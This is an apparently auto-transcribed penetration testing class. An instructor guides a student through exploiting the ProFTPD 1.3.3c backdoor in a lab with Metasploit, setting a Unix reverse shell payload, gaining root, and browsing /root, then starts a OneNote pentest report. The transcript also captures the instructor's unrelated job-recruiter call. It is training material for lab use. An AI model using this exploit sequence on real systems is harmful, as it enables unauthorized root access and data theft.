--> I'm looking at my notes. --> So now, that's the cool thing about this thing. --> Anonymous sometimes works. --> That is something for you to look up later. --> And I'll try to be here with you so we can look it up, --> because there's a reason for it. --> If it's telling you this area right here and you don't have the actual username and password, you won't be able to get the information, and that's fine. --> But the Pro FTPD shows you, when you did the search exploit, that there is a compromised source backdoor. --> Linux remote is a .txt file, and then there's the backdoor command execution where you can use Metasploit. --> So may I ask a question? --> Yes. --> We're on Cali, and so you just did a search exploit. --> So I don't have to, like, pull up the individual tool of Metasploit. --> I can just combine them on Cali with the proper command. --> Oh, that was – so you're going to have to use the individual tool for Metasploit, --> but what you want to do is search for vulnerabilities. --> You can search for vulnerabilities at the CVE website. --> You can search it on Google. --> the bottom line is you don't know you didn't know what pro ftpd was don't care what you use --> to research it once it shows you that there is a potential backdoor into that specific system --> now you have a choice you can do that whole remote code execution or you can use metasploit --> what you're going to do now is type msf console on the right press enter this is how you enter --> metasploit you're exploiting you decided to exploit the backdoor command execution what --> you would do is you will google search how to do that and google will give you steps on how to do --> that. Does that make sense? Yes. Okay. So for right now, what I'm going to do is I'm going to --> give you some steps just so that we can get it and then we'll reverse engineer it at the end. --> Now that you're in Metasploit, I want you to type search space pro FTPD, like it was typed, --> capital P. Yeah. 
R O. It's on the left side. See it written? I know. I got to find it. Okay. --> F-T-P-G. --> That's an R there, just so you know. --> T-T-P-G. --> Don't forget the capital. --> Space 1.3.3C. --> I'll say yes. --> Press enter. --> Oh, wow. --> Look at that right there. --> Look at the feedback. --> It's letting you know that it has a ranking of excellence. --> That should give you some confidence that you can actually pen test and create a backdoor into this system. --> Not that hard. --> Exactly. --> So now there is the use number is actually zero. --> See, it says number, name, disclosure, date, rank. --> The number is zero. --> So what you need to type is use, U-S-E, space, zero. --> Enter. --> Uh-oh. --> It's taking you into the back door. --> Now you want to type the word options. --> Make sure you spell it right. --> Okay. --> What's that say? --> It gives you a lot of heat. --> The C host, the proxies, those are a no. --> They're required. --> They're not required. --> There are hosts, and there are ports for port 21 are required. --> Okay. --> those are the remote hosts okay so now this is what we're going to do from here --> you're going to set the our host so that's what it's telling you to do type --> in sct space our host and what is your IP address for the remote host now no s on --> our host you want me to put the IP address with the IP address of the --> remote post. There you go. You got it. Press enter. It's set. Fantastic. Now you want to type the word --> show payload. Okay. Show payloads with an S. Put a space after the word show. --> Wow. Look at all these different ways you can actually create a backdoor into this machine. --> Isn't this exciting? --> Yes. --> OK. --> So we are looking at the numbers again and the names. --> We have to find something that's going to match, --> something that's going to work for this particular machine. --> So let me see here. --> Double, purl, this. 
--> The cmd/unix/reverse should work, which is number four. --> So we want to set payload. Type in set, space, payload, space, four, space, four, space, four. --> Press enter. Okay, that's the cmd/unix Linux reverse shell. All right, and it should come up. --> Then we want to type the word options, press enter. Oh snap, we got a whole lot going on. --> We got CHOST, we have the RHOST is 10.0.3.16, that's what we want, the target port is port 21, --> the LHOST is required, on port 4444. So what we want to do now is we want to set the LHOST. --> I need to look up LHOST. What is an LHOST? The, uh, local, local host, your machine for listening. Okay. --> Yeah, so set, got it. Type in set, oh, set, okay, space, LHOST, now you got to remember, space, --> your IP address for the, um, the Kali Linux machine. So this is what you're going to do. --> On the left side, on the left terminal, right-click. --> Split the terminal top and bottom. --> Type in ip, space, a. --> Press enter. --> What's your IP address? --> 10.0.1. --> Type that in as your LHOST. --> Wrong time. --> Hello. --> Right. --> That's your listening machine. --> Press enter. --> Okay. --> Now, how are you feeling?
--> Okay, let's run it. Type run, press enter. All right, it's starting the --> listener, sending backdoor command. Saying that, cool. Okay, now, okay, we got --> this: accepted, it's in. Okay, let's see here, session opened. One session is --> open, it's created. Okay, type in whoami. Oh, you are root. At the end of the day, once you get root --> access, that means you have admin access, right? That means you can do anything that you want to do. --> Okay, now type, um, id, enter. Verify you have root access as the user, the UID, --> root access in the group. Okay, so now type in, um, change directory, cd, space, slash root, forward slash --> root, press enter. Type ls. Type ls, space, tack al. Wow, you got some heat in there, right? --> This is what you would do once you get into the machine. Guess what the goal was for basic --> pen testing? The goal is to get into the system, and you're in, and you've done it. You tracking? --> Yes. You just hacked into a machine and got root access. If a bad guy can get root --> access into any machine, life is not grand. If there was data on that machine, it would show up --> like that when you type the... you go on the /root and you type list, and, um, now there's good --> data there. The .bash, uh, the .bashrc, the .cache, all that's the profile. You would have to --> research all of that to see what they mean, right? When a person gets inside of a machine, --> they want to find, get root access, and they want to find any and all data that they can. --> Usernames, passwords, all that. Now what you need to do is screenshot all of this process, --> and then I'm going to give you something. Go to Firefox right there.
--> So, screenshot, what do, how do I do that? I'll show you in a minute. Go to Firefox. --> Firefox, um, there we go. Open up a new, open up a new tab. Yep. And I want you to type in metasploit, --> space, tutorial. Press enter. Wow. Getting started with Metasploit. --> Metasploit Unleashed, free online ethical hacking course. Uh, step-by-step guide. --> Click on the step-by-step guide. Let's see what that is. That's the box I like, that guy. --> Scroll down a little bit. Allow selection, something. Use necessary cookies only. Whichever one gets --> rid of that cookie thing. Click on... you click at the bottom. It says use necessary cookies only, --> on the far right. Just click the box, use necessary cookies only, on the right. Click --> that. There you go. Now scroll to the top. Swipe it down. Scroll up to the top. Something, --> a touchscreen. Straight out to the table of contents. Scroll down to the table of --> contents. Scroll down. Oh, you went far down. Okay, so here's how it is, since the --> scroll bar is messing with you. This is just one of many resources that will show you how to use --> Metasploit. How many things can you do in Metasploit? Too many. Are we going to get it in two --> days? Probably not. Metasploit establishes a guaranteed TCP handshake, and you can do the --> absolute most inside of someone else's machine by just following these steps. You actually did it, --> and now you need to reverse engineer by reading the instructions. Go ahead and click the back --> button at the top left. Yes. Took it again. Okay, click on the first one, Getting --> Started: Metasploit for Pen Test. Okay, Rapid7. Yes, um, everything you need --> is online. There are even better, or more, maybe, user-friendly Metasploit tutorials --> where you literally go step by step by step by step by step by step. You need to --> create that in your OneNote --> for yourself. --> So that when or if --> you ever have to do this --> by yourself, you know --> exactly what to do. You know what LHOST means. --> You know what RHOST means.
You know how to set the --> options. You know how to run it. You know how to set the --> payloads. So now... --> Can we do a sample? Yes, we're going to do it. --> A status point? You just did it. --> But what we're going to do now is take notes. --> Go to --> your... Click on the --> terminal behind you. Scroll --> all the way up to the top on the left. Fantastic. Now go to your OneNote. What is the OneNote? I --> don't know what OneNote is. We don't use it. Okay, click on the dragon on the top left. --> Oh, Kali. Type in OneNote. That's only because I installed it. I installed it for you so you can --> have it. You, you click on the dragon again. It was just there. Click on the dragon. Type OneNote. --> See it right there? --> Fantastic. --> I have to teach you how to take notes. --> This is actually my OneNote, --> right? --> Hold on a second. --> Close my OneNote. --> What kind of computer are you using? --> HP Envy, --> but I have it all dismantled --> and, like, you know, weirded out --> so I can get through the lab --> without any pop-ups. --> So, okay, well, my thing is, I want to say, um, HP, um, can you go, just, do you have, um, a Microsoft account? --> Do I have a Microsoft account? A Microsoft account, yeah. Oh, I mean, let's, let's just take a look. It's --> quick. Okay. Okay, so go to, um, your host computer, in the search bar, and type OneNote. And, yes, sir. --> Um, are you able to share your screen where I can see that window on your host computer? See it? --> You're sharing the desktop window for the desktop. Can you minimize your screen? Minimize, yeah, --> minimize that, um, terminal. Okay, it's not that. Um, minimize your, um, minimize the desktop. I can't --> even find that, where to minimize it. It's not the top right anywhere, or bottom? Yeah, I mean, can you --> see where I'm supposed to minimize this? Because all I'm trying to do is see your host computer. --> I know, I'm trying to pull it up. Okay, uh, go to, go to the Zoom icon at the bottom. --> Zoom icon. I'm there. --> Okay. Stop sharing. --> Stop sharing this one.
Stop sharing. Let's just see what's going on. --> Let me know what's happening, because I don't see anything. I don't see --> anything either. And I don't have, I don't... --> Let me just look for it. So it should be at the --> bottom. It should say Zoom. It does, but it doesn't pull up. --> It's just a Zoom page with nothing on it. --> And you don't see the stop share red button, the little hidden icon thing that dropped down before? --> No, because, oh, hold it. --> Let me get my profile. --> There you are. --> I see you now. --> But so this all got shut down. --> Okay. --> Do you have another screen by chance in your home? --> Yeah. --> Okay. --> I have a... --> Yeah, because if you can get another screen and hook this up, all these problems go away. --> Oh, it's gonna... no, I don't have another Microsoft. I have Apple, and it's not gonna go away, it's --> gonna make it worse. Gotcha. He's done. No, this is my only computer that I use for this stuff. --> So do you have a smart television where you can cast stuff to it, or even HDMI? So, no. Okay. --> My network is the one I have this on. Okay, meaning the other one is not my own. I got you. --> So let me, let me share my screen with you. Let me just show you what I need you to do, --> because this is a part of the lesson, right? Uh, report writing is something that we must --> do. I'm going to share this thing. Can you see my screen? Yes. Fantastic. All right. So this is --> the basic pen testing that we just did. The Metasploit backdoor. I took a screenshot of the --> target.
What I actually wanted your help with, I intentionally did not do this, is I documented the --> IP address, I did the sudo arp-scan, I got the output, I ran my nmap scan, I did my searchsploit, --> I did my msfconsole, I did my search on here for that, I found what I needed, right? I'm using zero, I --> have options, all right, it's showing me all these things right here that I can possibly do. --> I set the RHOST, I showed the payloads, I selected number four, that's what I wanted, --> I did my options, it put me right into the exploit, unix, ftp, proftpd, --> right? I mean, I ain't gonna... I've done some really advanced pen tests with Metasploit. --> And then I set the LHOST. --> I ran it, right? --> I think I had an error there, but I ran the thing. --> whoami. --> See, whatever. --> I run it. --> I really didn't have to do anything else, because all I wanted to do was get into the machine. --> Once I was into the machine, I was good. --> The next pen test we want to do is going to become more advanced. --> Now, what I wanted you to do, and I was going to help you with it, is I want to show you how to --> write it like this. You will never hurt. See all these screenshots with my name on them? --> Because I'm trying to show you that I did it myself. I have all my commands. This will make --> things so much easier for you in the future. When you're going to share that with me, I'm going to --> show you how to do it. It doesn't take long. The only thing is you need to go to the search icon --> and type OneNote and open it. And then you're going to share it with whomever you want to. --> So I tell people all the time, I share things, lots of information, but not intellectual property. --> I get it. But also too, is that so you can get that muscle memory.
--> Um, by the way, I just realized it's 12:18. We haven't taken a break, and I apologize. --> We can take a break anytime you need it, but, um, I do need to take a break at 12:30 because I have --> somebody calling me. Do you, um, how long would you like to eat lunch? 30 minutes, an hour, what do you --> want? I, I'm whatever you say. Okay, I'm good with... I don't need to eat. I mean, I'm, I'll be back whenever --> you tell me to come back. Okay. Well, I only need to take a potty break and do a phone call, --> grab some lunch, and I can get back here as early as one o'clock, if that's okay. --> Great. Fantastic. Well, in the meantime, let me get you started with this, because I really want --> you to do it like this so you can show people. It doesn't take long. It's just, I have to show you --> how. So now I'm going to stop sharing, and I want to show you how to get this OneNote. We can do it --> in two places. I just need to, I need to see you. I pulled it up, but I don't know how to share it. --> So if you see my image, you should be able to share screen. You have, I see a share. There you go. --> Now it's gonna pull, share to Microsoft Outlook 365. I don't know. Just share the entire screen. --> Share entire notebook? No, entire screen. That's not an option. Okay, um, what are the options? --> The options are share notebook, copy notebook, email copy of page. It's Microsoft options. It's not, --> it's not on my Zoom page. Okay, well, then just share it. Okay, is that what you want? Uh, something's --> happening. Yeah, that's what I wanted. Now you're sharing the entire screen. Fantastic. Yes, here we --> are. Yes. Okay, here we go. You ready? Type Basic Pen Testing. Okay, now, um, all right, there I want you --> to put down my name, Dr. Wesley Phillips, W-E-S-L-E-Y. Okay, just put the, uh, S before the L and take that --> S out, and Wesley. It's okay. Hey, there you go. Now I want you to put down today's date, August 1st, --> 2025, and you can put that right underneath my name when you get a chance. Just did this all --> summer. My brain, like, okay, I
just gotta go back to school. August 1st, 2025, that I did reports all --> summer. Just fantastic. Now, on the left where it says Pen Testing, but click Add Page. Black. --> Add Page. Good. Voila. Now you're gonna, on, underneath Friday, click there. Okay, we're gonna make some --> magic happen. Okay, you're gonna type, I'm gonna read it to you, we're not gonna make a mistake, we're --> gonna go great. Type the word Project, but make sure you capitalize those, because it's gonna be titles. --> Capital P in the word Project. Hit the Tab button. Fantastic. Type Commands. --> Hmm, you went to the other page. Okay, that's okay. Now you're going to type, um, Screenshots, the Tab --> button, Analysis, the Tab button, one more time, and type, uh, Lessons Learned. Like, we need a long list --> for that box, Lessons Learned. Press enter. Okay, um, you're gonna type Objective. Okay, --> on the, under, press the back, backspace. There you go. Put the cursor inside Lessons Learned, --> underneath it, press enter. That's how you get a new line. Now you're going to type --> Written Permission. Okay, we're going to fill in that information later. Put a, right-click, --> in permission, got an, ion, supposed within, good. Put it in the Lessons Learned box, press enter. --> That's how you get a new line. Now you're going to type, um, Find the Target Machine IP. Find target --> machine IP. I just do Target IP. That's fine. In the Commands, you're going to type --> sudo netdiscover. sudo, space, netdiscover. Press enter. As a matter of fact, put the number one in --> front of sudo. sudo, one in front of, in front of sudo. Put number one. One, period. No, no, let's do it --> again. One, period, space, sudo. Put the cursor at the netdiscover, press enter. Now you got a bullet --> two automatically. Now you're going to type sudo, space, arp, dash, scan. Don't forget the dash, --> otherwise you will not find it. No, no, no, space, arp, dash, dash, no, go back, go back. Oh, --> arp, dash, no, arp-scan. There you go. Space, dash, space, okay, dash l. Fantastic. Put the cursor in Lessons --> Learned, press enter. Now you
want to write Verify Connectivity. Now, Commands, number one, period, --> space, ping, press enter. Of course you'll ping the IP address. You can put that in. What? Yes, you type --> it. 10.0.3.16. I remember it. Yes. Enter. What was the second command again? fping, space, 10.0.3.16. --> Okay, go to Lessons Learned, press enter. Okay, um, Vulnerability Scan. On the end, just right-click, --> and there you go. There you go. Now press on one, period, space, type in nmap, space, 10.0.3.16, --> press enter. Type in nmap, space, 10.0.3.16, space, tack, capital A. I think what we did first. --> Press enter. Type in nmap 10.0.3.16, space, capital A, space, dash p dash, or tack p tack, yeah. Go ahead --> and press Lessons Learned, press enter. Okay, okay, no, no, that's good. Go back to number four again. --> You're right. Type in nmap, space, 10.0.3.16, space, tack A, space, tack p. --> Capital A? No, same thing. Write the same thing you wrote. We're adding, space, dash p dash. --> Capital A, capital A, write the same thing you did above. That's what you said, dash p dash. --> Dash, space, lowercase p. It makes a difference. Dash, space, greater-than sign, that's less --> than, space, I think we put bpnmapscan.txt. Fantastic. Go to Lessons Learned, press enter. --> There's so much more we can do, but let's get to where we need to be. We're going to, --> where is it? This is here. They move that. And here, after we did that, the output of the scan --> is what we did next. So that was, oh, go to Written Permission, Lessons Learned. Press enter. --> Oh, that didn't work. Backspace, or Control-Z. Okay. Right-click right there. Go to Table.
--> Insert Row Below. Go up. Insert Row Below. Okay, so, um, type Find My IP Address, and you're going to --> type number one, period, space, ip, space, address. Just so you know, everything is always lowercase --> in Linux unless it specifies it. Press enter. Or you can type ip, space, addr. Enter. Or you can type --> ip, space, a, a small-case a. Yeah, I'm trying to do... I don't have my caps on, but it, that's okay. --> It capitalizes. I'm gonna go back and change all this. I'm not worried. As soon as you take your call. --> I'm not even worried. They didn't call yet, so I'm gonna keep going. Now I need you to put the cursor --> down. Go, press down arrow, press backspace until you get back to the a. There you go. Clean. Now see --> how clean that is. Now go to the Lessons Learned box. No, go to underneath Vulnerability Scan, and we want --> to type, um, Enumeration, a slash, Exploitation. Okay, now in the Commands type one. Okay, he's calling now. --> So, um, put your screen, put your screenshots inside that, that box. --> Okay. --> Go to Insert. --> All right. --> I'll be right back. --> We'll talk. --> All right. --> All right. --> Speaking. --> Pretty good news, Steve Perry. --> Yes, sir. --> I am busy, but it's a good time. --> About the opportunity. --> And if it aligns for you and it kind of makes sense, --> then we'll get into a little more about yourself and how you might align for --> this thing for us. --> Does that make sense? --> Sure. --> So, again, my name's Steve, and I work directly for ATEC. --> I'm the Talent Acquisition Director. --> And what we do at ATEC is really, we're federal contractors with a focus on health IT. --> So we support companies. --> Are you still here? --> And it's really IT-focused. --> The opportunity that I'm looking at is an RFP, so I want to be very clear about that up front.
--> Um, it's not the work that we want yet, uh, but we feel like we can position pretty well to it with --> our past performance. Is, uh, in contract, actively teaching a penetration testing class, and so --> that's, and it was scheduled for today and tomorrow from nine to five. Five-oh-one, I'm yours, unless I --> can get out of here early, which I doubt, because, uh, people paid a lot of money to be in the course. --> Yeah, I know, you call that the craziest day in time. Normally, I'm totally available. But I'm just, that I actually am teaching this course today. It's today and tomorrow, and I'm available. I mean, I may be able to take a break at, like, 3:30 or something like that. --> But a lady that, I mean, these people are gung-ho with what I'm showing them. --> And it's a hands-on penetration testing course that I'm showing them. --> And you should see their faces. --> It's kind of like, I don't even know what to tell you. --> They are, like, excited. --> At least schedule something for you. --> All right, schedule that at 3:30. --> I'll see if I can get out of here. --> I mean, at least get on there. --> Yeah, exactly. --> Four is good. --> I can take a break at four. --> If you can... --> I'm literally trying to send it to you now. --> Don't go anywhere, if you can. --> I'm just trying to... --> Where is my Gmail? --> And... --> Steve Perry. --> Famous name. --> There you go, that's right. --> As I get older, there's less people saying it. --> That dude... --> I happen to be a musician, --> and he just sings his face off. --> He does. --> He does, that... --> Definitely one of my favorite singers. So that, I think, now it's just something --> to that email. Now, if you need to redact anything, go ahead and do so. --> I want to give you the... that's fine. You click on my portfolio, my cybersecurity portfolio, --> and you'll probably find it under certifications for this thing.
And let me see if I can make four --> o'clock work. All right, everybody, take, take a look at their résumé real quick. Let me know if I have --> to change anything. Moved my, eight stock, cyber stuff. That won't be a conflict anyway. There's --> something that, I mean, I teach certification courses as well. No, I'm in my house teaching. --> So much has happened in those past 27 minutes. --> Can you share? Yes, I can. Um, so, um, uh, I, uh, this guy emailed me last night, and he pretty much offered --> me a job, and, um, I would be the, the Deputy Chief Information Security Officer for a government --> agency, and, um, he's like, I need to know something today, because they want to interview you today, and --> And I was like, he said, we have to have something in place by Monday, again. --> I was like, that's fast. --> He's like, can you interview today? --> I said, man, I'm teaching a class right now. --> So I said, no. --> Don't let him pressure you. --> You just jack up the price. --> I did. --> Yes. --> Way to go, Dr. West. --> Thank you. --> So we'll see what happens. --> But I'm going to work that out. --> And I sent him a résumé and the whole nine. --> And then I got some Chinese food ordered that's going to be delivered to me. --> I can't wait to get it. --> Oh, good. --> Yeah. --> But I'm also excited about what we're doing, because I can see evidence of your work. --> This is repeatable stuff. --> Yeah. --> I'm better at just being in the lab with no interruptions, without all this nonsense --> popping up, without the split screen, where I can really just go into it. --> Right. --> And I'm way better at that
--> than writing reports, but when I write them, they're perfect. Fantastic, that's good. I mean, and --> that's just it. So for me, as a former CISO who used to manage pen testers, right, and actually do --> internal teaching to all of the, the SOC, um, you cannot, you have to write a report, otherwise you're --> going to get in trouble. And, um, and so it's, uh, um, let me show you something real quick. --> Oh, am I, I look like I am sharing. I'm not sure, share, but, um, I don't see, but let me --> reduce this. Okay, I see two different desktops now. Okay, so this is my... --> Okay, so then that means you're still sharing your screen, I guess. --> Yeah, you're shut down. It looks like yours is, um, black. It just says dot.